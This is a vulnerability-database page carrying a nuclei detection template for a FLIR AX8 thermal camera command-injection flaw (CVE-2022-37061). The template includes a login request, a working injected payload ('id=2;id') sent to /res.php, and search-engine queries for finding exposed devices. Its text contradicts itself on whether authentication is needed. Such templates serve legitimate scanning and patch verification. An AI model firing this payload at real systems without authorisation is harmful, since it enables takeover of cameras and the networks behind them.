Lucene search
K

FLIR AX8 1.46.16 - Remote Command Injection

🗓️ 25 Jun 2026 05:45:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

FLIR AX8 1.46.16 is vulnerable to unauthenticated remote command injection via user input.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
FLIR AX8 1.46.16 Traversal / Access Control / Command Injection / XSS Vulnerabilities
22 Aug 202200:00
zdt
0day.today
FLIR AX8 1.46.16 Remote Command Execution Exploit
22 Aug 202200:00
zdt
0day.today
FLIR AX8 1.46.16 Remote Command Injection Exploit
2 Nov 202200:00
zdt
ATTACKERKB
CVE-2022-37061
18 Aug 202200:00
attackerkb
Circl
CVE-2022-37061
18 Aug 202222:26
circl
CNNVD
Teledyne FLIR AX8 操作系统命令注入漏洞
18 Aug 202200:00
cnnvd
Check Point Advisories
FLIR AX8 Thermal Camera Command Injection (CVE-2022-37061)
21 Nov 202200:00
checkpoint_advisories
CVE
CVE-2022-37061
18 Aug 202200:00
cve
Cvelist
CVE-2022-37061
18 Aug 202200:00
cvelist
Exploit DB
FLIR AX8 1.46.16 - Remote Command Injection
16 Apr 202500:00
exploitdb
Rows per page
id: CVE-2022-37061

info:
  name: FLIR AX8 1.46.16 - Remote Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    FLIR AX8 version 1.46.16 and below is susceptible to an unauthenticated remote command injection vulnerability.The vulnerability exists in the alarm functionality where user-supplied input in the 'id' parameter is not properly sanitized,allowing attackers to inject and execute arbitrary OS commands.
  impact: |
    Authenticated attackers can execute arbitrary OS commands on FLIR AX8 thermal imaging cameras through command injection in the alarm functionality's id parameter, potentially gaining complete control over the camera system and connected infrastructure.
  remediation: |
    Upgrade to the latest version of FLIR AX8 that addresses this vulnerability. Implement proper input validation and sanitization for all user-supplied data.
  reference:
    - https://www.exploit-db.com/exploits/52240
    - https://www.flir.com/products/ax8-automation/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37061
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-37061
    cwe-id: CWE-78
    epss-score: 0.99618
    epss-percentile: 0.99945
  metadata:
    verified: true
    max-request: 1
    vendor: flir
    product: ax8
    shodan-query: title:"FLIR"
    fofa-query: app="FLIR-AX8"
  tags: cve,cve2022,flir,ax8,rce,authenticated,vkev,vuln

http:
  - raw:
      - |
        POST /login/dologin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_name={{username}}&user_password={{password}}

      - |
        POST /res.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=alarm&id=2;id

    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - 'uid=([0-9(a-z)]+)'
          - 'gid=([0-9(a-z)]+)'
          - 'visualBeep'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a1a59b70e07b47367a5aae1635b63f9cb5dab029f8615c1ad3b9e02f1f85e448022100b4922a6408f163361f1ca715ed4801e2a8ee1ccfbca9a667ec1fa273ae3b6c1d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8
EPSS0.99618
13